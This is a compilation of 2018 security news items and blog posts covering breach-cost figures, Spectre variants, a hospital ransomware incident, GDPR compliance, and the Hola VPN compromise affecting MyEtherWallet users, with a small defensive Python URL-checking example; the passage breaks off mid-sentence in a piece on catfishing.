For the first time, this year’s study examined the effects of organizations adopting AI as part of their security automation strategy and the extensive use of IoT devices. AI security platforms save companies money — an average of $8 per compromised record — and use machine learning, analytics and orchestration to help human responders identify and contain breaches. However, only 15 percent of companies surveyed said they had fully deployed AI. Meanwhile, businesses that use IoT devices extensively pay $5 more per compromised record on average.

To get the full rundown of the potential costs associated with a data breach — and learn what you can do to help protect your business — download the 2018 Cost of Data Breach Study: Global Overview, and take a look at our accompanying infographic.

You can also use our data breach calculator to explore the industry, location and cost factors if you experience a security incident.

Download the complete 2018 Cost of a Data Breach Study from Ponemon Institute

Examine the cost of a data breach in 2018 with this data breach calculator

The post Calculating the Cost of a Data Breach in 2018, the Age of AI and the IoT appeared first on Security Intelligence.

Two New Spectre-Class CPU Flaws Discovered—Intel Pays $100K Bounty

Intel has paid out a $100,000 bug bounty for new processor vulnerabilities related to Spectre variant 1 (CVE-2017-5753). The new Spectre-class variants are tracked as Spectre 1.1 (CVE-2018-3693) and Spectre 1.2, of which Spectre 1.1, described as a bounds-check bypass store attack, is considered the more dangerous. Earlier this year, Google Project Zero researchers disclosed

Facebook Fined £500,000 by ICO for Cambridge Analytica Data Scandal

The Information Commissioner’s Office (ICO) announced its plan to fine Facebook £500,000 over the Cambridge Analytica data scandal. On 10 July, the ICO published a progress report on its investigation into the Cambridge Analytica incident. The report, entitled “Investigation into the use of data analytics in political campaigns,” explained that the ICO had sent a […]… Read More

The post Facebook Fined £500,000 by ICO for Cambridge Analytica Data Scandal appeared first on The State of Security.

Department of Commerce Report on the Botnet Threat

Last month, the US Department of Commerce released a report on the threat of botnets and what to do about it. I note that it explicitly said that the IoT makes the threat worse, and that the solutions are largely economic.

The Departments determined that the opportunities and challenges in working toward dramatically reducing threats from automated, distributed attacks can be summarized in six principal themes.

  1. Automated, distributed attacks are a global problem. The majority of the compromised devices in recent noteworthy botnets have been geographically located outside the United States. To increase the resilience of the Internet and communications ecosystem against these threats, many of which originate outside the United States, we must continue to work closely with international partners.

  2. Effective tools exist, but are not widely used. While there remains room for improvement, the tools, processes, and practices required to significantly enhance the resilience of the Internet and communications ecosystem are widely available, and are routinely applied in selected market sectors. However, they are not part of common practices for product development and deployment in many other sectors for a variety of reasons, including (but not limited to) lack of awareness, cost avoidance, insufficient technical expertise, and lack of market incentives.

  3. Products should be secured during all stages of the lifecycle. Devices that are vulnerable at time of deployment, lack facilities to patch vulnerabilities after discovery, or remain in service after vendor support ends make assembling automated, distributed threats far too easy.

  4. Awareness and education are needed. Home users and some enterprise customers are often unaware of the role their devices could play in a botnet attack and may not fully understand the merits of available technical controls. Product developers, manufacturers, and infrastructure operators often lack the knowledge and skills necessary to deploy tools, processes, and practices that would make the ecosystem more resilient.

  5. Market incentives should be more effectively aligned. Market incentives do not currently appear to align with the goal of "dramatically reducing threats perpetrated by automated and distributed attacks." Product developers, manufacturers, and vendors are motivated to minimize cost and time to market, rather than to build in security or offer efficient security updates. Market incentives must be realigned to promote a better balance between security and convenience when developing products.

  6. Automated, distributed attacks are an ecosystem-wide challenge. No single stakeholder community can address the problem in isolation.

[...]

The Departments identified five complementary and mutually supportive goals that, if realized, would dramatically reduce the threat of automated, distributed attacks and improve the resilience and redundancy of the ecosystem. A list of suggested actions for key stakeholders reinforces each goal. The goals are:

  • Goal 1: Identify a clear pathway toward an adaptable, sustainable, and secure technology marketplace.
  • Goal 2: Promote innovation in the infrastructure for dynamic adaptation to evolving threats.
  • Goal 3: Promote innovation at the edge of the network to prevent, detect, and mitigate automated, distributed attacks.
  • Goal 4: Promote and support coalitions between the security, infrastructure, and operational technology communities domestically and around the world.
  • Goal 5: Increase awareness and education across the ecosystem.

IoT And Your Digital Supply Chain

“Money, it’s a gas. Grab that cash with both hands and make a stash”, Pink Floyd is always near and dear to my heart. No doubt the theme song to a lot of producers of devices that fall into the category of Internet of Things or IoT.

I can’t help but to giggle at the image that comes to mind when I think about IoT manufacturers. I have this vision in my head of a wild-eyed prospector jumping around after finding a nugget of gold the size of a child’s tooth. While this imagery may cause some giggles it also gives me pause when I worry about what these gold miners are forgetting. Security comes to mind.

I know, I was shocked myself. Who saw that coming?

While there is a mad rush to stake claims across the Internet for things like connected toasters, coffee makers and adult toys, it seems security falls by the wayside. A lot of the mistakes that were made and corrected along the way as the Internet evolved into the monster it is today are returning. IoT appears to be following a similar trajectory, but at a far faster pace.

With this pace we see mistakes like IoT devices being rolled out with deprecated libraries and zero ability to upgrade their firmware or core software. But no one really seems to care as they count their money while they're still sitting at the table. The problem really comes into focus when we realize that it is the rest of us who will be left holding the bag after these manufacturers have made their money and run.

Of further concern is the fractured digital supply chains that they are relying on. I’m worried that with this dizzying pace of manufacture that miscreants and negative actors are inserting themselves into the supply chain. We have seen issues like this come to the forefront time and again. Why is it that we seem hell bent on reliving the same mistakes all over again?

One of my favorite drums to pound on is the use of deprecated, known vulnerable, libraries in their code. I’ve watched talks from numerous presenters who unearthed this sort of behavior at a fairly consistent pace. What possible rationale could there be for deploying an IoT device in 2016 with an SSL library that is vulnerable to Heartbleed?

I’ll let that sink in for a moment.

And this is by no means the worst of the lot. These products are being shipped to market with preloaded security vulnerabilities that can lead to all manner of issues. Data theft is the one that people like to carry on about a fair bit but, it would be a fairly trivial exercise to compromise some of these devices and have them added to a DDoS botnet.

What type of code review is being done along the way on code written by outsourced third parties? This happens a lot, and it really does open a company up to the risk of malicious, or simply poor, code being introduced.

The IoT gold rush is a concern for me from a security perspective. Various analyst firms gush about the prospect of having 800 gajillion Internet enabled devices online by next Tuesday but, they never talk about how we are going to clean up the mess later on. Someone always has to put the chairs up after the party is over.

Originally posted on CSO Online by me.

The post IoT And Your Digital Supply Chain appeared first on Liquidmatrix Security Digest.

Missouri hospital forced to divert patients after ransomware attack

A Harrisonville, Missouri-based hospital has been forced to shut down some operations and divert patients after a ransomware attack on its infrastructure and electronic health record (EHR) vendor.

Ransomware operators have shifted focus from the consumer segment to the more lucrative business sector. In recent months, bad actors have acquired a specific taste for healthcare providers.

Earlier this week, Cass Regional Medical Center – a hospital in Harrisonville, Missouri – posted a notice announcing it has fallen victim to a ransomware attack. The incident is only the latest in a long string of ransomware attacks targeting the healthcare industry in the past 12 months.

“At approximately 11 a.m. this morning, Cass Regional Medical Center became aware of a ransomware attack on its information technology infrastructure,” reads the notice, posted by the hospital on Facebook. “Affected areas include internal communication systems and access to the organization’s electronic health record (EHR). At this time, there is no evidence that patient data has been breached, but as an extra precaution, Meditech, the hospital’s EHR vendor, has opted to shut down the system until the attack is resolved.”

Hospital leadership was prompt in responding to the attack. Within half an hour of the first signs of attack, patient care managers reportedly met to devise a plan to continue to tend to patients safely and effectively. The IT department, meanwhile, called on law enforcement and cybersecurity experts to take steps toward mitigation.

To ensure optimal care for its patients, clinical leaders have decided to go on “ambulance diversion” for trauma and stroke emergencies, according to the notice. “Hospital personnel will continue to evaluate the situation and respond accordingly,” Cass Regional Medical Center said.

Details about the ransomware strain used by the attackers were not available at press time.

The GDPR Evolution: A Letter to the CISO

The long-term impact of the General Data Protection Regulation (GDPR) is on the minds of key technology leaders around the world — from Singapore to Ireland to my current home of Austin, Texas to everywhere in between. You can see this manifest in major tech publications like SecurityIntelligence (and, perhaps, in the day-to-day interactions occurring within your organization).

For me, these sentiments were echoed during a several-week, multi-continent business trip I took to visit with clients and partners in Europe and Asia. Nearly every leader we sat down with asked us how they should be shepherding their teams through the enforcement of this transformative regulation and who should lead this effort between the security and privacy teams.

This state of confusion is not surprising, especially given the hype surrounding GDPR. A recent IBM Institute for Business Value (IBV) survey found that 44 percent of executives responsible for GDPR compliance worried the regulation would be replaced or modified sometime in the near future. This perception undoubtedly muddies the waters and influences their approach to compliance.

Even with enforcement live, it’s still somewhat unclear what GDPR compliance truly means for organizations worldwide; how it will impact people, process and technology; and (even more importantly) how it will affect relationships with customers.

But one thing is abundantly clear: GDPR is here to stay.

Who Is Responsible for GDPR Compliance?

Let’s take a step back for a moment to reflect on where we started. GDPR originated as a means to help infuse a higher standard of privacy into global business practices and give data subjects from the European Union (EU) more control over their personal information — a sovereignty that was challenged somewhat by the digital data explosion of the past decade. While the regulation only technically applies to EU data subjects, it signals a shift in how we think about privacy everywhere.

This redistribution of control in favor of consumers is a good thing. As security professionals, this supports our highest calling, which is to protect personal data in the face of cyber uncertainty. Ensuring data privacy is a core component of this mission — and the spirit of GDPR supports this goal. Some organizations recognize the importance of data privacy. In fact, 59 percent of respondents to the IBV study said they see GDPR as an occasion for transformation. Still, challenges remain.

Some of the pain originates from the fact that ownership of GDPR compliance initiatives shifted between 2016 (when the legislation was passed) and May 25, 2018 (when the regulation took effect). Originally, legal teams bore the core responsibility for validating the internal processes and controls that would drive the progression toward supporting GDPR requirements. This has morphed into a discussion led by chief information officers (CIOs) and chief information security officers (CISOs) about the implementation of technical controls, the creation of special teams, the appointment of chief data officers (CDOs) and the reshaping of organizational privacy processes to support the stringent requirements, such as a customer’s right to erasure.

Today, the responsibility is shared among technical teams, as well as CIOs and CISOs, who serve as the establishers, enablers and enforcers of a comprehensive GDPR program backed by robust technical controls. This accountability will likely remain for the foreseeable future — no pressure, though.

Collaboration is a key component of GDPR success, but the transition of responsibilities between teams is a challenge. I saw this in practice when visiting Singapore several weeks ago when leaders repeatedly asked where to begin so they could be ready to answer GDPR audit inquiries, which they expect to receive very soon.

Yes, the structures were in place from the legal side to support GDPR readiness, but now it’s game time. Despite years of effort to prepare for this moment, many technology leaders are still left scratching their heads, unsure of what comes next.

What Solutions Should CISOs Invest in to Get on Track?

According to the IBV study, the number one struggle among the surveyed group was performing data discovery and ensuring data accuracy, which is a principal task of GDPR preparation (and the first step for many). This issue illustrates the complex nature of operationalizing all the plans that have been made to get us to (and, hopefully, past) this point.

This point is where technology solutions and services can provide support. Unfortunately, although many vendors might want you to believe otherwise, there's no silver bullet for establishing GDPR readiness or enforcing the new requirements across your organization. This behemoth of a compliance regulation requires a programmatic approach, but it can often be difficult to see the forest for the trees.

My suggestion: Remember that you don’t have to reinvent the wheel.

There are countless industry frameworks — including IBM’s own GDPR framework, a continuous loop outlining five key phases for readiness — that can serve as your guide. The fact that these guidelines are based on the experiences of others can provide some peace of mind.

It’s also a great idea to leverage a trusted partner or adviser to guide you throughout your readiness and enforcement processes. Rather than going it alone, lean on the organizations that already have deep expertise in the privacy space and can use that insight to help your company avoid missteps as you implement processes and select technologies.

Finally, when it comes to implementing requisite technology controls, I would advise you to think about the regulation and follow a risk-based approach to conducting business with consumers. Consider the data you’re being asked to protect and how it relates to your customers: What personal or sensitive information does your organization hold? Where does it live? Is it actually vulnerable to compromise? Have you taken the necessary steps to put privacy and security protections into place?

As a first step toward gaining this understanding, you should investigate solutions that help identify and remediate risk, such as Guardium Analyzer, which can help you find and classify GDPR-relevant data, irrespective of where it resides (whether on-premises or in the cloud); identify vulnerabilities associated with that data; and, ultimately, prioritize existing risks and take action to remediate them.

The Secret to GDPR Compliance Is Collaboration

During my last customer visit on the trip, a CISO expressed confidence that her organization would be able to legally respond to GDPR demands. But she’s now setting up the technology teams with members from the privacy and security teams to assess and validate vulnerabilities without exposing the personally identifiable data that is deployed across multiple geographies and data center environments, both on-premises and in the cloud.

As you continue on your GDPR journey, don’t forget the importance of collaboration in making compliance happen — across teams, with business partners and even with your customers — so that you can best support the positive aims of GDPR today and in the future.

Sign Up for a 30-Day Free Trial of IBM Security Guardium Analyzer

DISCLAIMER: Clients are responsible for ensuring their own compliance with various laws and regulations, including the European Union General Data Protection Regulation. Clients are solely responsible for obtaining advice of competent legal counsel as to the identification and interpretation of any relevant laws and regulations that may affect the clients’ business and any actions the clients may need to take to comply with such laws and regulations. The products, services, and other capabilities described herein are not suitable for all client situations and may have restricted availability. IBM does not provide legal, accounting or auditing advice or represent or warrant that its services or products will ensure that clients are in compliance with any law or regulation.

Learn more about IBM’s own GDPR readiness journey and our GDPR capabilities and offerings to support your compliance journey here.

The post The GDPR Evolution: A Letter to the CISO appeared first on Security Intelligence.

Red Hat Security Advisory 2018-2167-01

Red Hat Security Advisory 2018-2167-01 - .NET Core is a managed software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET Core that address several security vulnerabilities are now available. The updated versions are .NET Core 1.0.12, 1.1.9, 2.0.9, and 2.1.2. These versions correspond to the July 2018 security release by .NET Core upstream projects.

Uncle Teeth – Application Security Weekly #23

This week, Keith and Paul talk The Hardest Problem in Application Security: Visibility. In the news, Google patches critical remote code execution bugs in Android OS, JavaScript API for face recognition in the browser with tensorflow.js, Social media apps are 'deliberately' addictive to users, and more on this episode of Application Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode23

Visit https://www.securityweekly.com/asw for all the latest episodes!

Visit https://www.activecountermeasures/asw to sign up for a demo or buy our AI Hunter!!

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Malicious Software Packages Found On Arch Linux User Repository

Yet another incident showcases that you should not implicitly trust user-controlled software repositories. Arch Linux, one of the most popular Linux distros, has pulled three packages from its user-maintained Arch User Repository (AUR) after they were found to host malicious code. Arch Linux is an independently developed, general-purpose GNU/Linux distribution composed predominantly of free

The Five Stages of Vulnerability Management

A key to having a good information security program within your organization is having a good vulnerability management program. Most, if not all, regulatory policies and information security frameworks advise having a strong vulnerability management program as one of the first things an organization should do when building their information security program. The Center for […]… Read More

The post The Five Stages of Vulnerability Management appeared first on The State of Security.

Hola VPN Hack Targets MyEtherWallet Users

MyEtherWallet (MEW), a well-known cryptocurrency wallet interface, used Twitter to urge MEW users who had used Hola VPN within the last 24 hours to transfer their funds immediately to a brand new account. MEW said it had received a report confirming that the Hola VPN Chrome extension had been compromised. According to MEW's Twitter account, the malicious extension was logging users' activity, including sensitive information such as usernames and passwords. The details of a currently unknown number of MEW users were exposed to the attackers during a five-hour window on July 9.

Hola VPN said in a blog post that, upon learning of the incident, it immediately set up a response team of cybersecurity experts to investigate and to prevent a recurrence, and that it took emergency steps to replace the malicious extension that was causing the data leak. MEW users who did not use the extension were not affected, as the MEW service itself was not compromised and the incident was entirely outside the MEW developers' control. The breach nevertheless casts a shadow over the Israeli VPN service provider.

This is not the first time MEW users have been targeted. Earlier this year hackers managed to snatch more than $300,000 through a sophisticated DNS hijacking attack, and many users lost their funds forever. Services such as MyEtherWallet do not operate like banks: they do not charge transaction fees, they do not offer insurance, and they do not store cryptocurrency. Instead, they provide an interface that allows users to interact directly with the blockchain. Largely unregulated and still in its wild west years, blockchain is like a vast, global, decentralized spreadsheet, and users alone are responsible for the funds they control through such wallet interfaces.

How to protect yourself?

First and foremost, use common sense and make sure that the sites you are visiting are legitimate. If you are a MEW user, your website needs to be https://www.myetherwallet.com. Even if a single letter in the URL is changed, you are not in the correct place, and you are being phished.

Avoid opening websites that feel sketchy, or you do not trust – clicking on random links you see on social media may end up forwarding you to malicious sites. If you want to access a specific website, open a new tab on your browser and type the correct link manually. Navigating directly to the website decreases the chances of ending up on a phishing website.
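To make the "even a single letter changed" rule concrete, here is an added example (not code from the Panda post or from MyEtherWallet) that contrasts the check most people do by eye, looking for the brand name somewhere in the address, with the check that actually works: parsing the URL and comparing the whole host name exactly. The expected host is the one the post names; the lookalike URLs are constructed for the example and are not real phishing sites.

```python
from urllib.parse import urlsplit

# The one host the post tells MEW users to check for. Everything else below is
# constructed for this example; the lookalike URLs are not real phishing sites.
EXPECTED_HOST = "www.myetherwallet.com"

LOOKALIKES = [
    "https://www.myetherwallet.com.evil.example/",  # real name, extra labels appended
    "https://www.myetherwallet.com@evil.example/",  # real name in the userinfo part
    "https://evil.example/www.myetherwallet.com/",  # real name in the path
    "https://www.myetherwaIlet.com/",               # capital I in place of lowercase l
    "https://www.myetherw\u0430llet.com/",          # Cyrillic a in place of Latin a
    "http://www.myetherwallet.com/",                # right host, but no TLS
]


def naive_check(url):
    """What a quick glance amounts to: does the brand name appear in the URL?
    Four of the six lookalikes above pass this check."""
    return "myetherwallet.com" in url.lower()


def check_wallet_url(url, expected_host=EXPECTED_HOST):
    """Return (ok, reason). Parse the URL and compare the whole host name
    exactly against the expected one, over HTTPS only."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() != "https":
        return False, "not https"
    # .hostname is lowercased and has userinfo ("user@") and ":port" removed
    host = parts.hostname or ""
    if host == expected_host:
        return True, "ok"
    if host.startswith("xn--") or not host.isascii():
        return False, "lookalike host (non-ASCII or punycode): " + host
    return False, "wrong host: " + host


def phishing_urls_missed_by_naive_check(urls=LOOKALIKES):
    """URLs that the substring check accepts but the exact-host check rejects."""
    return [u for u in urls if naive_check(u) and not check_wallet_url(u)[0]]


if __name__ == "__main__":
    for u in LOOKALIKES:
        print(naive_check(u), check_wallet_url(u), u)
```

The two homoglyph URLs happen to fail the substring check as well, but only because the substituted character breaks the match; the three structural tricks (extra labels, a userinfo part, the name in the path) and the plain-HTTP copy all sail through it. Browsers apply the same exact-host comparison when deciding which certificate and which saved password belong to a page, which is why a bookmark or a manually typed address is safer than a link.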

Do not use the same password on other websites. One of the worst cybersecurity practices is to use the same password on multiple sites. If you struggle to remember your passwords, use tools that allow you to keep them safe and protected, or write them on a piece of paper. Make sure to change your passwords every three months – sometimes it takes years for companies to announce that they have been hacked.

Lastly, make sure that you have antivirus software installed on all your connected devices and that you deal with reliable VPN service providers. As in real life, cheap (or free) sometimes ends up costing more. Quality VPNs encrypt your web traffic, do not allow hackers to monitor your online activity and do not let cybercriminals re-route your web traffic to phishing websites. Stay safe!

Download Panda FREE VPN

The post Hola VPN Hack Targets MyEtherWallet Users appeared first on Panda Security Mediacenter.

Plenty of catfish in the sea

Online dating apps back in 2012 weren’t the torrent of swipes, profiles, bots, and inane hook up lines that they are today, but they did bring us a fascinating new use of social media: a phenomenon called catfishing.

A "catfish" is a person who creates fake personal profiles on social media sites using someone